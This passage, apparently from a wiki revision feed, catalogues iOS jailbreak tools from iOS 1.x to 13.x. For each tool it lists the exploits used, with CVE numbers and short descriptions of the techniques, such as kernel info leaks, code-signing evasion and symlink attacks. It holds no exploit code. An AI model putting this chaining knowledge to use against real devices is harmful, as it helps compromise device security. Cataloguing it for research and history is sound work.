* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{CVE|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{CVE|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5 (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106017</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106017"/>
		<updated>2020-07-23T01:32:58Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: I corrected the capitalization of &amp;quot;lightspeed&amp;quot; (&amp;quot;LightSpeed&amp;quot;) and added the AppleAVE2Driver exploit and AppleSPUProfileDriver info leak that is used in unc0ver to jailbreak iOS 12.4.1.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
